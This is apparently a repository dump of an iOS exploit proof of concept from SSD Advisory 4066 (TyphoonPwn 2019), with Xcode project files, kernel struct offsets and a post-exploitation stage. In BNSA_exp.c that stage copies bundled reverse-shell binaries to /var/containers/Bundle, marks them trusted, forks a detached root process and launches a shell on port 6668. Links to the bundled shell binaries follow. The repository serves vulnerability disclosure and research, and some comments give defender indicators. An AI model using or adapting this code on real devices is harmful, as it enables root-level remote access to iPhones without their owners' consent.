iospwn_typhoonPwn_2019.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | iospwn_typhoonPwn_2019.xcscheme_^#shared#^_ 13 | 14 | orderHint 15 | 0 16 | 17 | 18 | SuppressBuildableAutocreation 19 | 20 | 00AC132D22B2B30600ADCB27 21 | 22 | primary 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // iospwn_typhoonPwn_2019 4 | // 5 | // Created by aa on 6/13/19. 6 | // Copyright © 2019 aa. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // iospwn_typhoonPwn_2019 4 | // 5 | // Created by aa on 6/13/19. 6 | // Copyright © 2019 aa. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | 11 | @interface AppDelegate () 12 | 13 | @end 14 | 15 | @implementation AppDelegate 16 | 17 | 18 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 19 | // Override point for customization after application launch. 20 | return YES; 21 | } 22 | 23 | 24 | - (void)applicationWillResignActive:(UIApplication *)application { 25 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 26 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. 
Games should use this method to pause the game. 27 | } 28 | 29 | 30 | - (void)applicationDidEnterBackground:(UIApplication *)application { 31 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 32 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 33 | } 34 | 35 | 36 | - (void)applicationWillEnterForeground:(UIApplication *)application { 37 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 38 | } 39 | 40 | 41 | - (void)applicationDidBecomeActive:(UIApplication *)application { 42 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 43 | } 44 | 45 | 46 | - (void)applicationWillTerminate:(UIApplication *)application { 47 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 
48 | } 49 | 50 | 51 | @end 52 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "iphone", 35 | "size" : "60x60", 36 | "scale" : "2x" 37 | }, 38 | { 39 | "idiom" : "iphone", 40 | "size" : "60x60", 41 | "scale" : "3x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "20x20", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "20x20", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "29x29", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "29x29", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "idiom" : "ipad", 65 | "size" : "40x40", 66 | "scale" : "1x" 67 | }, 68 | { 69 | "idiom" : "ipad", 70 | "size" : "40x40", 71 | "scale" : "2x" 72 | }, 73 | { 74 | "idiom" : "ipad", 75 | "size" : "76x76", 76 | "scale" : "1x" 77 | }, 78 | { 79 | "idiom" : "ipad", 80 | "size" : "76x76", 81 | "scale" : "2x" 82 | }, 83 | { 84 | "idiom" : "ipad", 85 | "size" : "83.5x83.5", 86 | "scale" : "2x" 87 | }, 88 | { 89 | "idiom" : "ios-marketing", 90 | "size" : "1024x1024", 91 | "scale" : "1x" 92 | } 93 | ], 94 | "info" : { 95 | "version" : 1, 96 | "author" : "xcode" 97 | } 98 | } -------------------------------------------------------------------------------- /SSD Advisory - 
4066/poc/iospwn_typhoonPwn_2019/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "version" : 1, 4 | "author" : "xcode" 5 | } 6 | } -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/BNSA_exp.c: -------------------------------------------------------------------------------- 1 | // 2 | // BNSA_exp.c 3 | // UHAK_final 4 | // 5 | // Created by aa on 6/1/19. 6 | // Copyright © 2019 aa. All rights reserved. 7 | // 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include "inject.h" 16 | #include 17 | #include 18 | #include 19 | // Every plain printf(...) call in this file expands to an empty block; only the parenthesised (printf)(...) call near the end of post_exp_main reaches the real function. 20 | #define printf(X,X2...) {} 21 | // printf_wow formats its arguments into a 256-byte buffer with snprintf and hands the buffer to log_toView (declared extern here, defined elsewhere). 22 | #define printf_wow(X,X1...) {char logdata[256];snprintf(logdata, sizeof(logdata), X, X1);extern void log_toView(const char *input_cstr);log_toView(logdata);} 23 | void display_ip_address(){ // Logs the name and IPv4 address of every AF_INET entry returned by getifaddrs, via printf_wow. 24 | struct ifaddrs *interfaces = NULL; 25 | struct ifaddrs *temp_addr = NULL; 26 | if(getifaddrs(&interfaces) == 0){ 27 | temp_addr = interfaces; 28 | while(temp_addr != NULL) { 29 | if(temp_addr->ifa_addr->sa_family == AF_INET) { // NOTE(review): ifa_addr is dereferenced without a NULL check; getifaddrs(3) documents that the field may be NULL - confirm 30 | 31 | printf_wow(" %s: ", temp_addr->ifa_name); 32 | char *ip_addr = inet_ntoa(((struct sockaddr_in *)temp_addr->ifa_addr)->sin_addr); 33 | printf_wow(" %s\n", ip_addr); 34 | } 35 | temp_addr = temp_addr->ifa_next; 36 | } 37 | freeifaddrs(interfaces); 38 | }else{ 39 | printf("Error: getifaddrs\n"); // compiled out by the printf macro above 40 | } 41 | } 42 | 43 | void post_exp_main(){ // Post-exploitation stage: copies two bundled payloads to fixed paths, marks them trusted through the inject.h helpers, and starts one of them in a detached child process. 44 | // Defender note: the fixed paths /var/containers/Bundle/reverseShell101 and /var/containers/Bundle/ios_reverseshell101 and the port string "6668" used below are concrete indicators when triaging a device suspected of having run this PoC. 45 | printf("+++ Post-Exploitation\n"); 46 | 47 | // All execution files must be under /var/containers/Bundle/, because root filesystem is not writable 48 | // Also must be outside the /var/containers/Bundle/Application, to be outside container daemon jurisdiction 49 | // NOTE(review): the return values of copyfile, fork, chmod and setuid in this function are not checked. 50 | extern char *reverseShell_path; 51 | char *new_path = "/var/containers/Bundle/reverseShell101"; 52 | if(access(new_path, F_OK)){ // access() is non-zero when the path is not accessible, so the copy runs only when the destination is missing 53 | copyfile(reverseShell_path, 
new_path, 0, COPYFILE_ALL|COPYFILE_RECURSIVE); 54 | } 55 | reverseShell_path = new_path; 56 | trust_aDirectory(reverseShell_path); 57 | 58 | extern char *ios_reverseshell; 59 | new_path = "/var/containers/Bundle/ios_reverseshell101"; 60 | if(access(new_path, F_OK)){ 61 | copyfile(ios_reverseshell, new_path, 0, COPYFILE_ALL|COPYFILE_RECURSIVE); 62 | } 63 | ios_reverseshell = new_path; 64 | trust_aFile(ios_reverseshell); 65 | 66 | display_ip_address(); 67 | printf_wow(" port: %s", "6668"); 68 | 69 | if(fork() == 0){ 70 | daemon(1, 1); // detaches the child while keeping its working directory and standard descriptors (nochdir=1, noclose=1); the author relies on this to keep the child alive 71 | 72 | // From here on the code runs in the detached child, which the author states is root and unsandboxed at this point. 73 | 74 | chmod(ios_reverseshell, 0755); 75 | 76 | // Demo: starts the ios_reverseshell binary with the copied directory and the port string "6668" as arguments; what that binary does with them is not shown in this file. 77 | char *argv[] = {ios_reverseshell, reverseShell_path, "6668", NULL}; 78 | (printf)("execvp failed: %d\n", execvp(ios_reverseshell, argv)); // the parentheses bypass the printf macro; this prints only if execvp returns, i.e. on failure 79 | } 80 | 81 | setuid(501); // Sets the app process back to uid 501 (the mobile user, per the author); the author states the already-forked child remains root 82 | } 83 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | UIFileSharingEnabled 6 | 7 | CFBundleDevelopmentRegion 8 | $(DEVELOPMENT_LANGUAGE) 9 | CFBundleExecutable 10 | $(EXECUTABLE_NAME) 11 | CFBundleIdentifier 12 | $(PRODUCT_BUNDLE_IDENTIFIER) 13 | CFBundleInfoDictionaryVersion 14 | 6.0 15 | CFBundleName 16 | $(PRODUCT_NAME) 17 | CFBundlePackageType 18 | APPL 19 | CFBundleShortVersionString 20 | 1.0 21 | 
CFBundleVersion 22 | 1 23 | LSRequiresIPhoneOS 24 | 25 | UILaunchStoryboardName 26 | LaunchScreen 27 | UIMainStoryboardFile 28 | Main 29 | UIRequiredDeviceCapabilities 30 | 31 | armv7 32 | 33 | UISupportedInterfaceOrientations 34 | 35 | UIInterfaceOrientationPortrait 36 | UIInterfaceOrientationLandscapeLeft 37 | UIInterfaceOrientationLandscapeRight 38 | 39 | UISupportedInterfaceOrientations~ipad 40 | 41 | UIInterfaceOrientationPortrait 42 | UIInterfaceOrientationPortraitUpsideDown 43 | UIInterfaceOrientationLandscapeLeft 44 | UIInterfaceOrientationLandscapeRight 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // iospwn_typhoonPwn_2019 4 | // 5 | // Created by aa on 6/13/19. 6 | // Copyright © 2019 aa. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | 13 | 14 | @end 15 | 16 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/inject.h: -------------------------------------------------------------------------------- 1 | /* 2 | * inject.h 3 | * 4 | * Created by Sam Bingner on 9/27/2018 5 | * Copyright 2018 Sam Bingner. All Rights Reserved. 6 | * 7 | */ 8 | 9 | #ifndef _INJECT_H_ 10 | #define _INJECT_H_ 11 | 12 | void trust_aFile(const char *file_path); 13 | void trust_aDirectory(const char *dir_path); 14 | #endif 15 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/kernel_stru.h: -------------------------------------------------------------------------------- 1 | // 2 | // kernel_stru.h 3 | // UHAK_final 4 | // 5 | // Created by aa on 6/1/19. 6 | // Copyright © 2019 aa. All rights reserved. 
7 | // 8 | 9 | #include 10 | #include 11 | 12 | #ifndef kernel_stru_h 13 | #define kernel_stru_h 14 | 15 | struct semaphore{ 16 | // Partial view of the kernel semaphore object (the author cites sync_sema.h); only the two fields below are named. 17 | char pad[0x38]; // opaque padding that places owner at offset 0x38; the layout is hard-coded and the kernel build it matches is not stated here 18 | uint64_t owner; // (task_t) task that owns semaphore 19 | uint64_t port; // (ipc_port_t) semaphore port 20 | 21 | /* 22 | How to locate owner: 23 | sync_sema.c 24 | kern_return_t semaphore_create(task_t task. 25 | s = (semaphore_t) zalloc (semaphore_zone); 26 | s->owner = task; 27 | */ 28 | }; 29 | 30 | #define KOFFSET(_STRU, _MEM) _##_STRU##__##_MEM // expands to the name of the variable that holds the offset of _MEM inside _STRU 31 | #define KOFFSET_INIT(_STRU, _MEM) extern vm_offset_t _##_STRU##__##_MEM // in this header: declares that variable as extern 32 | 33 | KOFFSET_INIT(task, bsd_info); 34 | KOFFSET_INIT(task, itk_self); 35 | KOFFSET_INIT(ipc_port, kobject); 36 | KOFFSET_INIT(proc, p_ucred); 37 | 38 | KOFFSET_INIT(proc, task); // auto-generated 39 | KOFFSET_INIT(task, itk_nself); 40 | KOFFSET_INIT(task, itk_sself); 41 | 42 | 43 | 44 | 45 | #endif /* kernel_stru_h */ 46 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/kernel_stu.c: -------------------------------------------------------------------------------- 1 | // 2 | // kernel_stu.c 3 | // UHAK_final 4 | // 5 | // Created by aa on 6/3/19. 6 | // Copyright © 2019 aa. All rights reserved. 
7 | // 8 | 9 | #include "kernel_stru.h" 10 | 11 | #undef KOFFSET_INIT 12 | #define KOFFSET_INIT(_STRU, _MEM, _OF) vm_offset_t _##_STRU##__##_MEM = _OF // redefined for this file so that each KOFFSET_INIT line defines the variable and gives it its value 13 | 14 | KOFFSET_INIT(task, bsd_info, 0x358); // the offsets in this file are fixed constants; the kernel build they match is not stated here 15 | // t_flags 0x390 16 | /* 17 | task->bsd_info 18 | vm_unix.c 19 | kern_return_t pid_for_task(struct pid_for_task_args *args) 20 | t1 = port_name_to_task_inspect(t); 21 | p = get_bsdtask_info(t1); 22 | pid = proc_pid(p); 23 | 24 | */ 25 | 26 | KOFFSET_INIT(proc, task, 0); // auto-generated (initialised to 0 here; presumably filled in elsewhere - not shown) 27 | KOFFSET_INIT(proc, p_ucred, 0xF8); 28 | /* 29 | proc->p_ucred 30 | vm_unix.c 31 | 32 | sysctl_root 33 | -> mac_system_check_sysctlbyname 34 | -> kauth_cred_get 35 | 36 | */ 37 | 38 | KOFFSET_INIT(task, itk_self, 0xD8); 39 | KOFFSET_INIT(task, itk_nself, 0); // auto-generated 40 | KOFFSET_INIT(task, itk_sself, 0); // auto-generated 41 | 42 | //KOFFSET_INIT(proc, p_textvp, 0x230); 43 | KOFFSET_INIT(ipc_port, kobject, 0x68); 44 | 45 | #include 46 | #include 47 | #include 48 | #include 49 | #include 50 | #include 51 | #include 52 | #include 53 | #include 54 | #include 55 | #include 56 | #include 57 | #include 58 | 59 | #define MAX_CHUNK_SIZE 0xFFF 60 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // iospwn_typhoonPwn_2019 4 | // 5 | // Created by aa on 6/13/19. 6 | // Copyright © 2019 aa. All rights reserved. 
7 | // 8 | 9 | #import 10 | #import "AppDelegate.h" 11 | 12 | int main(int argc, char * argv[]) { 13 | @autoreleasepool { 14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/pwned.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/pwned.png -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/bash: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/bash -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/cat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/cat -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/chmod: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/chmod -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/cp: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/cp -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/date: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/date -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/dd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/dd -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/df: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/df -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/hostname: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/hostname -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/kill: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/kill 
-------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/launchctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/launchctl -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/ln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/ln -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/ls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/ls -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/mkdir: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/mkdir -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/mv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/mv -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/ps: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/ps -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/pwd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/pwd -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/rm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/rm -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/rmdir: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/rmdir -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/sh -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/sleep: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/sleep -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/stty: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/stty -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/zsh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/zsh -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/etc/profile: -------------------------------------------------------------------------------- 1 | export PS1='$USER@$HOST ($PWD)# ' 2 | export PATH=/usr/bin:/bin:/sbin:/usr/sbin:/usr/local/bin 3 | 4 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/etc/zshrc: -------------------------------------------------------------------------------- 1 | # 2 | # /etc/zshrc is sourced in interactive shells. It 3 | # should contain commands to set up aliases, functions, 4 | # options, key bindings, etc. 
5 | # 6 | 7 | watch=(all) 8 | 9 | 10 | 11 | if [ -f ~/2.DO ]; then 12 | cat ~/2.DO 13 | fi 14 | if [ `id -gn` = `id -un` -a `id -u` -gt 14 ]; then 15 | umask 002 16 | else 17 | umask 022 18 | fi 19 | 20 | # Set up aliases 21 | alias mv='nocorrect mv' # no spelling correction on mv 22 | alias cp='nocorrect cp' # no spelling correction on cp 23 | alias df='df -h' # More human readable 24 | alias mkdir='nocorrect mkdir' # no spelling correction on mkdir 25 | alias more='less' 26 | alias ~='cd ~' 27 | alias grep='grep --color=auto' # Colors on Grep 28 | 29 | 30 | # Shell functions 31 | setenv() { export $1=$2 } # csh compatibility 32 | # Johnny's opts... 33 | setopt correct 34 | setopt correct_all 35 | setopt nohup 36 | #set correct=cmd 37 | 38 | # Some environment variables 39 | export USER=`id -un` 40 | export LOGNAME=$USER 41 | export HOSTNAME=`/usr/bin/uname -n` 42 | export MAIL=/var/spool/mail/$USER 43 | 44 | path=($path $HOME/bin) 45 | export PATH=$PATH:/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin 46 | 47 | 48 | # Set prompts 49 | #PROMPT=%b%S"$USER@%m %{%}(%~) %#%s%B" # default prompt 50 | #RPROMPT="%B%T%b" # prompt for right side of screen 51 | #SPROMPT='You meant %r, Right? ' 52 | 53 | 54 | # 55 | 56 | RPROMPT="%B%{%}%T%{%}%b" 57 | PROMPT=%b%S"$USER@%m %{%}(%~) %#%s%B" # default prompt 58 | 59 | # 60 | # below works, but if no zsh files are in /etc/profile.d it complains 61 | # every time zsh is run. Commenting out for now. 62 | # 63 | # run other components 64 | #for i in /etc/profile.d/*.zsh 65 | #do 66 | # source $i 67 | #done 68 | 69 | # bindkey -v # vi key bindings 70 | bindkey -e # emacs key bindings 71 | bindkey ' ' magic-space # also do history expansion on space 72 | 73 | #------------------------------------------------------------------------ 74 | # Define LINUX Color Styles Here! 
75 | #------------------------------------------------------------------------ 76 | 77 | LS_COLORS="no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:\ 78 | cd=40;33;01:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:\ 79 | *.bat=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:\ 80 | *.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.gif=01;35:\ 81 | *.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.README=05;1:*.DO=05;1:*.avi=00;32:*.mp3=00;33:" 82 | export LS_COLORS 83 | 84 | LS_OPTIONS="--color=tty -F -T 0" 85 | export LS_OPTIONS 86 | export CLICOLOR=1 87 | alias d=dir 88 | alias v=vdir 89 | alias vi=vim 90 | 91 | PROMPT_COMMAND='echo -ne "\033]0;${USER}@${HOSTNAME}: ${PWD}\007"' 92 | 93 | export MANPATH=/usr/share/man:/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.9.sdk/usr/share/man 94 | 95 | export LESS_TERMCAP_mb=$'\E[01;31m' 96 | export LESS_TERMCAP_md=$'\E[01;31m' 97 | export LESS_TERMCAP_me=$'\E[0m' 98 | export LESS_TERMCAP_se=$'\E[0m' 99 | export LESS_TERMCAP_so=$'\E[01;44;33m' 100 | export LESS_TERMCAP_ue=$'\E[0m' 101 | export LESS_TERMCAP_us=$'\E[01;32m' 102 | export LESS=-r 103 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/sbin/dmesg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/sbin/dmesg -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/sbin/ifconfig: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/sbin/ifconfig -------------------------------------------------------------------------------- /SSD 
Advisory - 4066/poc/reverseShell/sbin/kextunload: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/sbin/kextunload -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/sbin/md5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/sbin/md5 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/sbin/mknod: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/sbin/mknod -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/sbin/ping: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/sbin/ping -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/sbin/shutdown: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/sbin/shutdown -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/.DS_Store: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/.DS_Store -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/arch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/arch -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/chflags: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/chflags -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/cut: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/cut -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/du: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/du -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/false: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 
